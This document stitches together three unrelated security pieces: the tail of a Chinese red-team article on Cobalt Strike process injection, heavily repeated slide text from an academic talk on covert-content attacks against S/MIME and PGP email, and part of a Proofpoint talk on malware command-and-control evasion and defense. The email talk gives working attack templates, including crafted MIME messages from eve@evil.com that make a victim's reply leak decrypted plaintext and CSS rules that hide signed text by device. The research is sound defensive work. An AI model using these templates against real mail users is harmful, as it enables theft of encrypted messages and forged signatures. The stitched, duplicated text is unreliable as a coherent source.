细节,然后再拆解到CS的自定义功能中,非常有利于我们做对抗。最后的进程注入技术,虽然略显老 旧,现在已经出现了各种新的进程注入技术例如:Process Doppelgänging、Process Ghosting等等。 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 7 / 7 - Welcome to www.red-team.cn
Re: What’s up Johnny? Covert Content Attacks on Email End-To-End Encryption Jens Müller, Marcus Brinkmann, Damian Poddebniak, Sebastian Schinzel, Jörg Schwenk Remember EFAIL? 2 • Last year: EFAIL Remember EFAIL? 2 • Last year: EFAIL – Major attack with a logo Remember EFAIL? 2 • Last year: EFAIL – Major attack with a logo – Novel attack techniques targeting S/MIME + PGP Remember EFAIL? 2 • Last year: EFAIL – Major attack with a logo – Novel attack techniques targeting S/MIME + PGP • Today: non-crypto attacks Remember EFAIL? 2 • Last year: EFAIL – Major attack with a logo – Novel attack techniques targeting S/MIME + PGP • Today: non-crypto attacks – Targeting encryption and digital signatures Remember EFAIL? 2 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 3 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 3 Technology's promise 4 I. “Strong crypto is virtually unbreakable.” Technology's promise 4 I. “Strong crypto is virtually unbreakable.” II. “Digital signature will prevail. Math wins.” Technology's promise 4 I. “Strong crypto is virtually unbreakable.” II. “Digital signature will prevail. Math wins.” Technology's promise …claims I. and II. could be bypassed with a single reply to a benign looking email? What if… 4 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message… Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message… Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message… Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news -----BEGIN PGP MESSAGE----- … -----END PGP MESSAGE----- Traditional PGP/Inline 6 From: alice@good.com To: johnny@good.com Subject: Important news -----BEGIN PGP MESSAGE----- … -----END PGP MESSAGE----- Traditional PGP/Inline 6 From: alice@good.com To: johnny@good.com Subject: Important news -----BEGIN PGP MESSAGE----- … -----END PGP MESSAGE----- Traditional PGP/Inline 6 Multipart MIME email 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email multipart/mixed 7 Content-type: text/plain Some ASCII text message… Content-type: text/plain This is the 2nd part From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Multipart MIME email multipart/mixed text text 7 From: alice@good.com To: johnny@good.com Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/html <b>HTML</b> message… Content-type: application/pdf %PDF-1.4 […] Multipart MIME email multipart/mixed pdf html 7 From: alice@good.com To: johnny@good.com Subject: Important news Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… S/MIME 8 From: alice@good.com To: johnny@good.com Subject: Important news Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… S/MIME 8 From: alice@good.com To: johnny@good.com Subject: Important news Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… S/MIME 8 OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies Two competing standards 9 OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies Two competing standards 9 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 10 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 10 Attacker model 11 • Eve has captured ciphertext Attacker model 11 • Eve has captured ciphertext • Can modify email structure Attacker model 11 • Eve has captured ciphertext • Can modify email structure • Can re-send it to the victim Attacker model 11 • Eve has captured ciphertext • Can modify email structure • Can re-send it to the victim – Either to recipient or sender Attacker model 11 • Eve has captured ciphertext • Can modify email structure • Can re-send it to the victim – Either to recipient or sender – Both can decrypt the email Attacker model 11 Covert content attack: Decryption oracle 12 Covert content attack: Decryption oracle 12 Covert content attack: Decryption oracle 12 Covert content attack: Decryption oracle 12 To: johnny@good.com Decryption oracle From: alice@good.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 To: johnny@good.com Decryption oracle From: alice@good.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… Content-type: text/plain What's up Johnny? 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- To: johnny@good.com Decryption oracle From: eve@evil.com Content-Type: application/pkcs7-mime MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB… Content-type: text/plain What's up Johnny? multipart/mixed ??? text 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny? multipart/mixed text secret 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny? 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny? 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny?\n\n\n\n\n\n… 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny?\n\n\n\n\n\n… 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/html What's up Johnny? <!-- 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-type: text/plain Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/html What's up Johnny? <!-- 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-ID: <part2> Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/html What's up Johnny? <img src="cid:part2"> 13 Content-type: multipart/mixed; boundary="XXX" --XXX --XXX --XXX-- Content-Disposition: attachment Secret message, for Johnny's eyes only… To: johnny@good.com Decryption oracle From: eve@evil.com Content-type: text/plain What's up Johnny? 13 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 14 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 14 Covert content attack: Signing oracle 15 Covert content attack: Signing oracle 15 Covert content attack: Signing oracle 15 Covert content attack: Signing oracle 15 Covert content attack: Signing oracle 15 From: eve@evil.com To: johnny@good.com Content-type: text/html What's up Johnny? I hereby declare war. Signature oracle 16 Signature oracle From: eve@evil.com To: johnny@good.com Content-type: text/html What's up Johnny? <div class="covert"> I hereby declare war. </div> 16 Signature oracle From: eve@evil.com To: johnny@good.com Content-type: text/html <style> IF condition: Hide * but show .covert </style> What's up Johnny? <div class="covert">I hereby declare war.</div> 16 Signature oracle From: eve@evil.com To: johnny@good.com Content-type: text/html <style> @media (max-device-width: 834px) { .covert {visibility: hidden;}} </style> What's up Johnny? <div class="covert">I hereby declare war.</div> hide covert content on mobile devices 16 Signature oracle From: eve@evil.com To: johnny@good.com Content-type: text/html <style> @media (max-device-width: 834px) { .covert {visibility: hidden;}} @media (min-device-width: 835px) { * {visibility: hidden;} .covert {visibility: visible}} </style> What's up Johnny? <div class="covert">I hereby declare war.</div> but show on desktop devices 16 I'm fine, thanks. On 01/05/19 09:53, Eve wrote: > What's up Johnny? Re: What's up Johnny? 17 I'm fine, thanks. On 01/05/19 09:53, Eve wrote: > What's up Johnny? Re: What's up Johnny? Reply email sent from Johnny’s mobile phone 17 I'm fine, thanks. On 01/05/19 09:53, Eve wrote: > What's up Johnny? Re: What's up Johnny? Reply email sent from Johnny’s mobile phone 17 I'm fine, thanks. On 01/05/19 09:53, Eve wrote: > What's up Johnny? Re: What's up Johnny? I hereby declare war. Signed email received on a desktop device Reply email sent from Johnny’s mobile phone 17 Conditional rules 18 • Targeting device type (@media) Conditional rules 18 • Targeting device type (@media) • Targeting email client (@supports) Conditional rules 18 • Targeting device type (@media) • Targeting email client (@supports) • Targeting user account (@document) Conditional rules 18 • Targeting device type (@media) • Targeting email client (@supports) • Targeting user account (@document) Conditional rules 18 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 19 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 19 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird Outlook Win. 10 Mail Win Live Mail The Bat! Postbox eM Client Linux KMail Evolution Trojitá Claws Mutt macOS Apple Mail MailMate Airmail iOS Mail App Android K-9 Mail R2Mail2 MailDroid Nine Web Exchange/OWA Roundcube Horde/IMP Mailpile ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird ● Outlook ○ Win. 10 Mail ○ Win Live Mail ○ The Bat! ○ Postbox ● eM Client ○ Linux KMail ◐ Evolution ◐ Trojitá ◐ Claws ◐ Mutt ◐ macOS Apple Mail ● MailMate ● Airmail ● iOS Mail App ● Android K-9 Mail – R2Mail2 ○ MailDroid ○ Nine ○ Web Exchange/OWA ○ Roundcube – Horde/IMP ○ Mailpile – ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird ● ● Outlook ○ ○ Win. 10 Mail ○ – Win Live Mail ○ – The Bat! ○ ○ Postbox ● ● eM Client ○ ○ Linux KMail ◐ ◐ Evolution ◐ ◐ Trojitá ◐ ◐ Claws ◐ ◐ Mutt ◐ ◐ macOS Apple Mail ● ● MailMate ● ● Airmail ● ● iOS Mail App ● – Android K-9 Mail – ○ R2Mail2 ○ ● MailDroid ○ ○ Nine ○ – Web Exchange/OWA ○ – Roundcube – ◐ Horde/IMP ○ ○ Mailpile – ○ ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird ● ● ● Outlook ○ ○ ◐ Win. 10 Mail ○ – ◐ Win Live Mail ○ – ● The Bat! ○ ○ ○ Postbox ● ● ● eM Client ○ ○ ◐ Linux KMail ◐ ◐ ○ Evolution ◐ ◐ ◐ Trojitá ◐ ◐ ◐ Claws ◐ ◐ ○ Mutt ◐ ◐ ○ macOS Apple Mail ● ● ◐ MailMate ● ● ● Airmail ● ● ● iOS Mail App ● – ● Android K-9 Mail – ○ – R2Mail2 ○ ● ◐ MailDroid ○ ○ ● Nine ○ – ● Web Exchange/OWA ○ – ● Roundcube – ◐ ◐ Horde/IMP ○ ○ ◐ Mailpile – ○ – ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird ● ● ● ● Outlook ○ ○ ◐ ◐ Win. 10 Mail ○ – ◐ – Win Live Mail ○ – ● – The Bat! ○ ○ ○ ○ Postbox ● ● ● ● eM Client ○ ○ ◐ ◐ Linux KMail ◐ ◐ ○ ○ Evolution ◐ ◐ ◐ ◐ Trojitá ◐ ◐ ◐ ◐ Claws ◐ ◐ ○ ○ Mutt ◐ ◐ ○ ○ macOS Apple Mail ● ● ◐ ◐ MailMate ● ● ● ● Airmail ● ● ● ● iOS Mail App ● – ● – Android K-9 Mail – ○ – ● R2Mail2 ○ ● ◐ ◐ MailDroid ○ ○ ● ● Nine ○ – ● – Web Exchange/OWA ○ – ● – Roundcube – ◐ ◐ ◐ Horde/IMP ○ ○ ◐ ◐ Mailpile – ○ – ○ ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 OS Client Decryption Signatures S/MIME PGP S/MIME PGP Windows Thunderbird ● ● ● ● Outlook ○ ○ ◐ ◐ Win. 10 Mail ○ – ◐ – Win Live Mail ○ – ● – The Bat! ○ ○ ○ ○ Postbox ● ● ● ● eM Client ○ ○ ◐ ◐ Linux KMail ◐ ◐ ○ ○ Evolution ◐ ◐ ◐ ◐ Trojitá ◐ ◐ ◐ ◐ Claws ◐ ◐ ○ ○ Mutt ◐ ◐ ○ ○ macOS Apple Mail ● ● ◐ ◐ MailMate ● ● ● ● Airmail ● ● ● ● iOS Mail App ● – ● – Android K-9 Mail – ○ – ● R2Mail2 ○ ● ◐ ◐ MailDroid ○ ○ ● ● Nine ○ – ● – Web Exchange/OWA ○ – ● – Roundcube – ◐ ◐ ◐ Horde/IMP ○ ○ ◐ ◐ Mailpile – ○ – ○ ● Plaintext can be completely hidden ◐ Plaintext merged with attacker-text ○ No vulnerabilities found – Cryptosystem not available Decryption oracles ● Covert rules kept in reply message ◐ Covert rules only for received mail Signature oracles 20 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 21 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 21 Decryption oracles 22 • Accepting ASCII text only Decryption oracles 22 • Accepting ASCII text only Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures • Warn on partial encryption Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures • Warn on partial encryption Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures • Warn on partial encryption • All-or-Nothing Encryption Decryption oracles 22 • Accepting ASCII text only • Enforcing digital signatures • Warn on partial encryption • All-or-Nothing Encryption Decryption oracles Root causes: long-term keys + ciphertext usage out-of-context 22 Signing oracles 23 • Dropping CSS Support Signing oracles 23 • Dropping CSS Support Signing oracles 23 • Dropping CSS Support • Only ASCII Text in replies Signing oracles 23 • Dropping CSS Support • Only ASCII Text in replies • Remove styles from replies Signing oracles 23 Conclusion 24 • Crypto is not enough, bypasses exist Conclusion 24 • Crypto is not enough, bypasses exist • 22 of 24 tested clients are vulnerable Conclusion 24 • Crypto is not enough, bypasses exist • 22 of 24 tested clients are vulnerable • Building security on top of email is hard Conclusion 24 • Crypto is not enough, bypasses exist • 22 of 24 tested clients are vulnerable • Building security on top of email is hard Conclusion Thank you! Questions? Exploits: github.com/RUB-NDS/Covert-Content-Attacks 24 HTML and CSS support in various email clients Proprietary conditional features Blinding options
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1 threat protection | compliance | archiving & governance | secure communication Malware Command and Control Channels - a journey into Darkness - By Brad Woodberg - Emerging Threats Product Manager / Proofpoint - @bradmatic517 - bradmatic@gmail.com 2 Agenda C2 Intro and Background (7 mins) Modern C2 Techniques (6 mins) Case Studies (15 mins) Predictions for C2 (5 mins) Defense (10 mins) Wrap Up (2 mins) 3 Why Command & Control? Vulnerabilities, Exploits, and Malware grab the headlines and analyst focus While very interesting, it is also very noisy, many exploits fail, very FP prone. If you can effectively detect C2 activity, you have a high fidelity indicator that an asset is actually compromised. With C2, the tables are turned on attackers, they go on defense, and we go on offense. 4 Primary Breach Vectors Modern malware is delivered in one of two ways: − Executable Content: Binary executables, embedded executable content like macros typically through web or email channels on the network. − Exploit Driven: An exploit against a software vulnerability such as those against Flash, PDF, Java, Office Docs, Browsers, and other network enabled applications. Regardless of how modern malware compromises a system, it is rarely autonomous. Dridex CVE-2016-4117 Angler EK 5 Why malware needs C2? Initial malware execution may occur under non-ideal scenarios: Malware may land on a non-target asset Malware may not have sufficient privileges when it executes Malware may be delivered in pieces to evade detection / fit into buffers Malware may require payload before it is malicious (e.g. TinyLoader) Malware may require coordination with C2 for operating instructions before it takes action (e.g. Crypto Ransomware waiting to receive a key) Enter Command and Control 6 Escalation Complete malware breach by acquiring additional executables, payloads, and configurations. − May be as simple as a word doc downloading an EXE (e.g. Dridex), − Or as complex as a dropper downloading an entirely new malware (e.g. Tinyloader / AbaddonPoS) Escalation stage is often carried out by contacting C2 Infrastructure This communication often leverages different infrastructure, protocols, and methods than the initial infection. − Often because infection infrastructure is rented, and C2 is managed by a different actor. 7 Exfiltration This phase is where the malware delivers on it’s intended purpose Exfiltrated data often includes stealing intellectual property, exposing attributes of a target network, or larger escalation of an attack. Locky Cataloguing Endpoint Files to C2 ZBOT (Zeus variant) DNS Covert Channel 8 Infection in Action: Angler Exploit Kit Redirect to Angler Infrastructure TDS Evaluates Target Client Exploit / Payload Delivered Target Compromised, C2 9 Lateral Infection vs. C2 Lateral Infection is not the same as C2! Lateral Infection focuses on Three Phases: − Introspection: Local device scanning − Network Scanning: mapping the network for potential targets and pivot points. − Exploit and Spread: Compromise other assets. LI typically involves using native networking protocols to scan and spread within an organization (e.g. Locky using SMB to encrypt file shares) LI often spreads by leveraging standard network protocols like SMB, WMI, SSH, vs. C2 channels which are often over HTTP/S, ToR, or custom protocols. Datacenter Workstation Workstation C2 Lateral Internet 10 C2 Channel Evolution: Cat and Mouse Early malware just used fixed non-standard ports to communicate e.g. Back Orifice 1998). Early malware often heavily leveraged IRC channels for a simple C2 infrastructure e.g. PrettyPark (1999) As some organizations tamped down on allowing ports outside of TCP 80/443 to communicate to the internet, so did malware evolve. Enter the NGFW which leveraged Layer 7 payload inspection (similar to IPS) to identify applications rather than attacks. Layer 3 Network Layer (IP) Layer 4 Transport Layer (TCP/UDP) Layer 7 Network Application Layer (HTTP) Layer [8] Software Application Layer (Dropbox) Layer [9] Content Layer (Docs, HTML) Access List Stateful Firewall NGFW/IPS Sandbox/NG-DLP CASB Malware noted that keeping explicit strings in the payload would be easy to identify (e.g. GhostRat). The same is true for potentially unwanted applications like Bittorent / Tor / Skype which also leveraged evasion techniques. To evade NGFW and other deep inspection technologies, malware shifted to leverage steganographic techniques to hide in plain sight. E.g. Sninfs Finally, malware has evolved even further to leverage highly obfuscated and embedded communication channels like jpgs, flash, encoded ASCII. In addition to the advanced obfuscation, malware has gone to great lengths to hide itself in legitimate, cloud applications. 11 C2 Hosting Evolution Early days C2 infrastructure was very fixed. Similar to traditional computing, it was physical machines in data centers with static IP’s. While DNS was prominent, domain names for malware would not change very quickly. Configuration Updates via CNC This weak link made for a great target for vendors providing defense mechanisms. So malware evolved as well to domain generation algorithms (DGA’s) which could quickly cycle through generated domain names to eliminate single points of failure. E.g. Conficker The issue with DGA’s is that the algorithm can be reverse engineered, and it still relies on DNS. Enter P2P Mechanisms like GameOver-Zeus To offset the potential disruptions for DGA’s, malware started leveraging common cloud services which enterprises are adverse to blocking as they may serve a business function. Timeline Complexity Static IP DNS Dynamic Configuration Updates DGA P2P Common Cloud Services / Steg 12 C2 & Steg: "Never write if you can speak; never speak if you can nod; never nod if you can wink.“ − Martin Lomasney, Gangster, Politician (1859-1933) Steganography (Steg) is hiding in plain sight. It has been used for centuries and provides plausible deniability. Protocol Headers, Metadata in Files, Altering Bits in Data, Unicode &c &c &c. Examples of how C2 can leverage Steg includes Embedding Configuration in Images, Audio, Video, File Metadata, and even network protocols! You can also layer Steg with encryption/encoding for additional obfuscation. 13 C2 Steg Continued Deterministically identifying when Steg is in use can be very expensive if not nearly impossible in many scenarios, especially when processing network streams in real time. This makes Steg a perfect choice for enhancing the robustness of malware C2. Source: IPv4/V6/TCP Header, LUC http://intronetworks.cs.luc.edu/1/html/tcp.html OpenPuff: http://embeddedsw.net/OpenPuff_Steganography_Home.html 14 C2 - Counter Offense Techniques Attackers think economically, want their malware to last as long as possible thus bringing the most ROI. Malware authors utilize several counter detection techniques to ensure the viability of their malware. − Filter who can connect (e.g. IP filtering to eliminate non-targets, researchers and sandboxing tools.) − Secret Handshakes: E.g. leverage custom TCP stacks or special low level handshakes that only illicit responses if correct handshake is used (e.g. Poison Ivy) − Encryption: Predefined SSL Certificates embedded in malware for authenticating client/servers − Steg: Anecdotally, we’ve seen an increase in anti- sandboxing techniques to prevent execution and avoid detection. TDS ACL Vendor/Non Target IP Space Target IP Space 256 Byte Challenge Request 256 Byte Challenge Response Source: Abuse.CH https://sslbl.abuse.ch/intel/9663b6799ba20d68734cc99aa83d6bbb0506f064 15 C2 Flavors: Crimeware vs. Targeted Crimeware: General Purpose Widely distributed Go to greater lengths to evade detection from a protocol perspective Yet quite chatty on C2 channels Targeted: Highly selective victims Will be custom built to navigate individual networks, common platforms. Often does not go to great lengths from an obfuscation perspective Targeted Espionage: Most exotic form of malware/C2 Far more sophisticated than traditional targeted. May lack network based C2 channels altogether. May leverage insiders as well as covert HW to bridge air gaps. 16 Case Studies Now that we’ve covered the background and evolution, let’s take a look at actual malware C2 channels to reinforce our examples. Note that there are often a great many variants for each malware and some leverage different communication than the mainstream samples which we will cover. 17 Gh0stRAT Basic C2 Protocol Common strains support a basic non-encoded string in the PCAP. ‘Gh0st’ string in initial payload to identify malware Non-Standard Port easily filterable Further Reading: http://malware-unplugged.blogspot.com/2015/01/hunting-and-decrypting-communications.html 18 PoisonIvy Unknown Encrypted, 256 Byte handshake Does not contain explicit strings in handshake which are easy to key on. Available since 2005, still very popular and little changed despite being in the wild so long. 256 Byte Handshake is exchanged in a CHAP like sequence. Client sends a hello which allows the server to prevent it from communicating with an unknown client. The server will only accept the client communication if it has been encrypted with the right password. 19 NanoLocker Some malware leverage common network utilities and infrastructure to embed C2 functionality NanoLocker leverages ICMP to ping a hardcoded address with an ICMP payload of the ransomware Bitcoin address. It will also send follow up payloads of the number of files encrypted on the system. 20 GameOver/Zeus GameOver / Zeus attempted to obfuscate its activities by leveraging P2P protocols to avoid single points of failure similar to how traditional P2P filesharing services work (loosely based on Kademlia DHT techniques Zeus leveraged basic rolling XOR for packet payloads to make signature based IDS difficult. UDP Payloads − Emphasizes the point that often times the malware authors will just attempt to stay one step ahead of security solutions rather than implement the most state of the art attacks. Further Reading: https://www.sans.org/reading-room/whitepapers/detection/analysis-gameover-zeus-network-traffic-35742 21 Dridex using Pastebin as C2 (aka Blind Drop) Virtually any cloud service can be used for C2. in this example Pastebin is leveraged. While sites like Pastebin might be simple to turn off, Twitter, Amazon, and Facebook may have legitimate business purposes. Malware may hide in comments, images, video and uploaded content. 22 Dalexis: ToR as a C2 Channel After an initial infection, malware hops to TOR2Web a clientless TOR implementation for C2 Activity TOR allows botnet operators to evade communication snooping in intermediate systems. Initial Compromise Probing for TOR Endpoint C2 Connection via Tor2Web 23 AridViper Targeted malware which leverages basic HTTP over standard ports to blend in. This stream is composed of initial client registration to C2 server, along with post registration activity to validate interesting files on the system. Arid Viper originally focused on Israeli targets Source: Proofpoint: https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View 24 C2 Trends and Projections: Encryption Encryption: − SSL adoption has rapidly gained steam in the last few years, SandVine Projects 70% encryption in 2016 − Let’s Encrypt could be huge game changer for malware − Previously cost/overhead was high for SSL, Let’s Encrypt eliminates this limitation. − Won’t impact state sponsored or targeted attacks much, but will impact Crimeware heavily. Source: Ilya Grigorik, Google: https://plus.google.com/+IlyaGrigorik/posts/GboyXCXxjGr Source: Let’s Encrypt: https://letsencrypt.org/stats/ Source: SandVine Spotlight Encrypted Traffic Report: https://www.sandvine.com/trends/encryption.html 25 C2 Trends and Projections: IPv6 IPv6 − Today IPv4 is still the predominate routed protocol on the internet, particularly outside of APAC and universities. This is changing. − IPv6 presents a big challenge because of the massive number of IPv6 addresses. E.g. Hurricane Electric will give you your own /48 of IPv6. That’s 65535 /64 networks, each with 18,446,744,073,709,551,616 hosts!!! − IPv6 also may expose weaknesses in security software that does not support it yet or has underlying flaws and vulnerabilities. − It is enabled by default in virtually every modern OS! Source: Google: https://www.google.com/intl/en/ipv6/statistics.html Source: Hurricane Electric: https://tunnelbroker.net/ Source: Jaws, Roy Schneider 1975 26 C2 Trends and Projections: TOR TOR − We’re already seeing an increase in malware using TOR − Ideal channel for concealment of the C2 − TOR can even be implemented without a client using Tor2Web. Source: Proofpoint ET Intelligence, Unique Malware Samples leveraging TOR Source: Tor2Web Project: https://www.tor2web.org/ 27 Leveraging Cloud Apps Hiding C2 in Cloud/Web Apps − This is likely to be a continuing trend. It helps to solve the attacker challenge of hosting and potential blacklisting of standalone C2 infrastructure by overlaying it on top of cloud applications which often have business legitimacy. − This makes it harder to detect and harder for organizations to take action on because they cannot block these apps. − Puts the onus on Cloud providers to detect malicious activity. The effectiveness will vary widely depending on how invested these providers are. − Cloud apps can be deployed with little more than an email address, often free compute infrastructure for attackers! Source: Alexa Top Websites: https://en.wikipedia.org/wiki/List_of_most_popular_websites 28 Layered Evasions: Ripe for the Picking Layered Evasions − Stacking numerous evasions from the IP level up the chain into the application layer to try to evade malicious activity detection by trying to fool detection capabilities (similar to traditional IDS layering evasion techniques. IP Fragmentation TCP Segment Overlaps SSL Encryption HTTP: Chunking, GZIP, Base64, Embedded Content (Encoding, Compression, Metadata, Dynamic Content) IP Protocol 41 (IPv6 in IPv4) 29 Steg Adoption Steganography − Hiding in plain sight really is a powerful covert channel. − Attackers may choose to take techniques which are not computationally difficult to generate, but are computationally difficult to detect, especially in real time network streams. − Trends will likely be dictated by pace of security industry defenses • Further Reading: http://embeddedsw.net/doc/Thwarting_audio_steganography_attacks_in_cloud_storage_systems.pdf • http://embeddedsw.net/doc/Data_hiding_and_steganography_annual_report_2012.pdf • Image Source: Inception, Christopher Nolan, 2010 30 C2 Detection Is Critical! High fidelity Indicator May prevent malware from successfully executing May prevent escalation to attack other hosts inside/outside the network May prevent sensitive data from making it out Makes more hoops for the attacker to jump through and therefore more opportunities to make a mistake. 31 Defense Mechanisms Part 1 Eliminate the Known Bad − Block access to known bad IP’s, countries − Block Access to Malicious Domains/URL’s Minimize the network attack surface − Restrict FW/NGFW to least privilege including • Restrict Firewall Ports!, no any any any policy • Block unnecessary / undesirable L7 applications with an NGFW/IPS • E.g. ToR, ToR2Web, Unknown Binary Strings • Block unknown / unknown encrypted applications at the perimeter with an NGFW/IPS • NGFW’s can identify low hanging fruit with AppID, IPS can help to identify potential protocol anomalies used when malware attempts to masquerade over HTTP/HTTPS ports. 78.23% 4.00% 1.84% 15.93% 0.00% 10.00% 20.00% 30.00% 40.00% 50.00% 60.00% 70.00% 80.00% 90.00% TCP Port 80 TCP Port 443 TCP/UDP Port < 1024 except 80,443 TCP/UDP Port > 1024 Malware C2 Channels by Port 32 Defense Mechanisms Part 2 Fingerprint Known Malware − Where possible, identify malware with both pattern matching and behavioral identification from a high fidelity source. If you can accurately identify malware itself, then you can have a higher degree of confidence of an infection. − Especially if you can identify the malware by it’s C2 channel 33 Defense Mechanisms Part 3 Eliminate SSL Blind Spot with Interception − SSL Interception is an increasingly important function if it can be leveraged. − It allows you to not only inspect encrypted streams, but also breaks any malware that uses predefined certificates / 